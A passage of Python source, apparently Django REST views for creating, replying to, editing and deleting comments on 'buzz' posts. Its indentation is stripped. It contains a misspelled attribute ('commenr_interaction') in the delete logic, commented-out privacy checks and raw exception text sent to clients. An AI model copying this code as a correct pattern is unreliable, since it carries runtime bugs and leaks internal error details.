buzz_instance = self._get_url_buzz(url_buzzid)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=buzz_instance,
level=1,
**serializer.validated_data,
)
interaction = buzz_instance.buzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["BUZZ"],
request.user,
buzz_instance,
created_comment,
)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
created_comment = serializer.save(
commenter=request.user,
parent_rebuzz=rebuzz_instance,
**serializer.validated_data,
)
interaction = rebuzz_instance.rebuzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["RBZ"],
request.user,
rebuzz_instance,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CreateCommentReplyView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
if comment_instance.parent_buzz:
if comment_instance.parent_buzz.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if comment_instance.parent_buzz.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
elif comment_instance.parent_rebuzz:
if comment_instance.parent_rebuzz.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if comment_instance.parent_rebuzz.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
parent_comment = self._get_url_comment(**kwargs)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=parent_comment.parent_buzz,
parent_rebuzz=parent_comment.parent_rebuzz,
parent_comment=parent_comment.id,
level=parent_comment.level + 1,
**serializer.validated_data,
)
parent_comment.comment_interaction.replies.append(created_comment.id)
parent_comment.comment_interaction.save()
# create notification
create_notification(
ACTION_TYPE["RPLY"],
CONTENT_TYPE["CMNT"],
request.user,
parent_comment,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## UPDATE
# ##################################
class EditCommentView(APIView):
serializer_class = EditCommentSerializer
permission_classes = [
IsAuthenticated,
IsCommentOwner,
]
required_fields = ["content"]
field_options = ["content", "flair"]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_rebuzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def patch(self, request, *args, **kwargs):
""" """
try:
data = request.data
comment_to_update = self._get_url_comment(**kwargs)
RequestFieldsChecker().check_fields(
data, self.field_options, self.required_fields
)
self.check_object_permissions(request, comment_to_update)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
serializer.update_comment(
comment_to_update, edited=True, **serializer.validated_data
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Updated",
f"Comment has been updated. `id:{comment_to_update.id}`",
),
status=status.HTTP_200_OK,
)
except (ExtraFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not edit comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## DELETE
# ##################################
class DeleteCommentView(APIView):
serializer_class = EditCommentSerializer
permission_classes = [
IsAuthenticated,
IsCommentOwner,
]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _delete_interactions(self, comment_to_delete, comment_id):
"""Delete parent interactions"""
buzz_instance = comment_to_delete.parent_buzz
rebuzz_instance = comment_to_delete.parent_rebuzz
comment_instance = comment_to_delete.parent_comment
if buzz_instance:
buzz_instance.buzz_interaction.comments.remove(comment_id)
buzz_instance.save()
if rebuzz_instance:
rebuzz_instance.rebuzz_interaction.comments.remove(comment_id)
rebuzz_instance.save()
if comment_instance:
comment_instance.commenr_interaction.comment.remove(comment_id)
comment_instance.save()
def delete(self, request, *args, **kwargs):
""" """
try:
comment_to_delete = self._get_url_comment(**kwargs)
self.check_object_permissions(request, comment_to_delete)
comment_id = comment_to_delete.id
comment_to_delete.delete()
self._delete_interactions(comment_to_delete, comment_id)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Deleted",
f"Comment has been deleted. `id:{comment_to_delete.id}`",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not delete comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.